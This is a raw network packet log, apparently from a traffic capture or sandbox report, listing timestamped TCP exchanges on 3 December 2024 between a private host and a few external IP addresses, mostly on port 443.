                                                                                                                      Dec 3, 2024 08:55:33.694186926 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.694461107 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.694525957 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.694555998 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.696809053 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.729785919 CET49948443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.739326954 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.744992971 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.824101925 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.824717045 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.824748039 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.825767994 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.825835943 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.826184034 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.826258898 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.826319933 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.826333046 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.827841997 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.828016043 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.828044891 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.829075098 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.829127073 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.829380035 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.829446077 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.829472065 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.869407892 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.869762897 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.869790077 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.872447014 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.872729063 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.872750044 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.873769999 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.873837948 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.874152899 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.874218941 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.874288082 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.874296904 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.915786982 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.916065931 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.916083097 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.916269064 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.916412115 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.917095900 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.917165041 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.918797970 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.918859959 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.919017076 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:33.919024944 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:33.961899996 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.031385899 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.031672001 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.031682968 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.032692909 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.032776117 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.033082008 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.033138037 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.033344030 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.033349991 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.046350956 CET8049764208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.046436071 CET4976480192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:55:34.073642969 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.078687906 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.081749916 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.081763983 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.082768917 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.082844019 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.083214998 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.083277941 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.083451033 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.083458900 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.127603054 CET4434994913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.127665043 CET4434994913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.127718925 CET49949443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.128005981 CET49949443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.128026962 CET4434994913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.128036976 CET49949443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.128042936 CET4434994913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.131334066 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.131381035 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.131464005 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.131649017 CET49962443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.131664991 CET4434996213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.137768030 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.265171051 CET4976480192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:55:34.385143042 CET8049764208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.388339996 CET44349946196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.388361931 CET44349946196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.388417959 CET49946443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.388427973 CET44349946196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.389225006 CET49946443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.389265060 CET44349946196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.389321089 CET49946443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.492218971 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.492252111 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.492259026 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.492301941 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.492335081 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.492351055 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.523907900 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.523936033 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.523991108 CET49948443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.524005890 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.524080992 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.524122953 CET49948443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.524236917 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.524295092 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.524336100 CET49948443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.524678946 CET49948443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.524693012 CET44349948196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.538743019 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.539417982 CET49958443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.539457083 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.540247917 CET49958443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.540254116 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.544472933 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.544876099 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.544903994 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.544912100 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.544967890 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.545068979 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.553067923 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.553128004 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.553155899 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.553183079 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.553323984 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.553467989 CET49947443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.553494930 CET44349947196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.556313038 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.556426048 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.556503057 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.556895018 CET49967443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.556932926 CET44349967196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.603425980 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.603470087 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.603965998 CET49956443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.603986979 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.604017973 CET49957443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.604038000 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.604470015 CET49957443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.604475021 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.604475975 CET49956443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.604481936 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.652024984 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.652059078 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.652067900 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.652124882 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.652151108 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657115936 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657154083 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657162905 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657222033 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.657243967 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657269001 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.657298088 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.659769058 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.659826994 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.659904957 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.660198927 CET49968443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.660217047 CET44349968196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.661370993 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.661449909 CET44349951196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.661535025 CET49951443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.698395014 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.714783907 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.714806080 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.714813948 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.714874983 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.714896917 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.736175060 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.736191034 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.736222029 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.736257076 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.736284018 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.743417978 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.743427038 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.743486881 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.743500948 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.743515968 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.743566036 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.743740082 CET49944443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.743761063 CET44349944196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.749830961 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.749865055 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.749943972 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.750287056 CET49970443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.750300884 CET44349970196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.753530025 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.753555059 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.753633022 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.753840923 CET49971443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.753854990 CET44349971196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.758421898 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.758455992 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.758465052 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.758524895 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.758541107 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.760854959 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.766902924 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.766992092 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.767153978 CET49953443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.767169952 CET44349953196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.860338926 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.860357046 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.860413074 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.860429049 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.861500025 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.861541033 CET44349955196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.861618042 CET49955443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.888761044 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.888772964 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.888855934 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.902406931 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.902414083 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.902477026 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.926234007 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.926259995 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.926268101 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.926292896 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.926325083 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.926340103 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.926357985 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.927779913 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.927788973 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.927850962 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.934007883 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.934062958 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.934091091 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.934106112 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.934158087 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.934458017 CET49954443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.934469938 CET44349954196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.938393116 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.938436031 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.938507080 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.938697100 CET49972443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.938705921 CET44349972196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.944530964 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.944567919 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.944647074 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.944777012 CET49973443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.944792032 CET44349973196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.945466995 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.945477009 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.945543051 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.955430031 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.955440998 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.955476046 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.955504894 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.955522060 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.955539942 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.955559015 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.955588102 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.956264019 CET49952443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.956275940 CET44349952196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.960489988 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.960520983 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.960589886 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.961065054 CET49975443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.961088896 CET44349975196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.966481924 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.966495037 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.966593027 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.968163967 CET49976443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:34.968175888 CET44349976196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.979197979 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.982518911 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.982589960 CET49958443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.985308886 CET49958443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.985323906 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:34.985337973 CET49958443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:34.985342026 CET4434995813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.024826050 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.024853945 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.024925947 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.027128935 CET49977443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.027143002 CET4434997713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.048084974 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.049256086 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.052984953 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.053047895 CET49957443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053116083 CET49957443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053133011 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.053143024 CET49957443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053148031 CET4434995713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.053284883 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.053342104 CET49956443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053443909 CET49956443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053458929 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.053471088 CET49956443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.053476095 CET4434995613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.070466042 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.070497990 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.070554018 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.071650982 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.071666002 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.071719885 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.082242966 CET49979443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.082257032 CET4434997913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.082717896 CET49978443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:35.082736969 CET4434997813.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.130496979 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.130536079 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.130681992 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.139125109 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.139209986 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.139393091 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.139457941 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.139468908 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.139525890 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.209223032 CET49950443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:35.209264994 CET44349950196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.247368097 CET4434995913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:35.293808937 CET49959443192.168.2.413.107.246.63
